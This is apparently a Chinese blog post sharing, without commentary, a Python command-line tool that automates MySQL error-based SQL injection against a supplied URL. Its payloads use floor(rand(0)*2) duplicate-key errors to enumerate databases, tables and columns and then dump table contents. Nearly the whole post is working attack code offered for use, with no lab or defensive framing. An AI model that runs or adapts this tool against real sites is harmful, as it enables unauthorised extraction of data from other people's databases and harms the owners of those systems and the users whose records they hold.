sql注入半自动化扫描工具——报错注入(分析后续补上)

代码展示墙:
关于注释和解析以后会补上
现在只是先将代码保存在这里


# -*- coding: utf-8 -*-
import requests
import sys
import hashlib
from optparse import OptionParser
import re
parser=OptionParser()
parser.add_option("-D", "--Database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")
(options,args) = parser.parse_args()

def main():
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database ==None and options.table == None and options.column == None:
        getAllDatabases(options.url)
    elif  options.url != None and options.database !=None and options.table == None and options.column == None:
        getAllTables(options.url,options.database)
    elif  options.url != None and options.database !=None and options.table != None and options.column == None:
        getAllColumnsByTable(options.url,options.table,options.database)
    elif  options.url != None and options.database !=None and options.table != None and options.column != None:
        getAllContent(options.url,options.column,options.table,options.database)
def http_get(url):
 a=requests.get(url)
 return a.content

def getAllDatabases(url):
 db_number_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(schema_name),'^_^') from information_schema.schemata),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) "
 html=http_get(db_number_payload)
 htmlc=str(html)
 db_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc,re.M).group(1))
 for i in range(db_number):
  db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',schema_name,'^_^') from information_schema.schemata limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % i
  db_name_get=http_get(db_name_payload)
  db_name_res=str(db_name_get)
  db_name_res_re=re.search(r'\^_\^(.*?)\^_\^',db_name_res,re.M)
  db_name=db_name_res_re.group(1)
  print(db_name)
def getAllTables(url,database):
 db_table_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(table_name),'^_^') from information_schema.tables where table_schema='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % database
 html=str(http_get(db_table_payload))
 db_table_number=int(re.search(r'\^_\^(.*?)\^_\^',html).group(1))
 for i in range(db_table_number):
  db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',table_name,'^_^') from information_schema.tables where table_schema='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (database,i)
  htmlc=str(http_get(db_name_payload))
  db_table_name=re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1)
  print(db_table_name)
def getAllColumnsByTable(url,table,database):
 db_cl_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(column_name),'^_^') from information_schema.columns where table_name='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % table
 htmlc=str(http_get(db_cl_payload))
 db_cl_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
 #print(db_cl_number)
 for i in range(db_cl_number):
  db_cl_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',column_name,'^_^') from information_schema.columns where table_name='%s'  limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (table,i)
  html_cl=str(http_get(db_cl_name_payload))
  db_cl_name=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
  print(db_cl_name)
def getAllContent(url,column,table,database):
 db_ct_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(%s),'^_^') from %s.%s),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table)
 htmlc=str(http_get(db_ct_payload))
 db_ct_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
 for i in range(db_ct_number):
  db_ct_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',%s,'^_^') from %s.%s limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table,i)
  html_cl=str(http_get(db_ct_name_payload))
  db_ct_string=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
  print(db_ct_string)
main()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值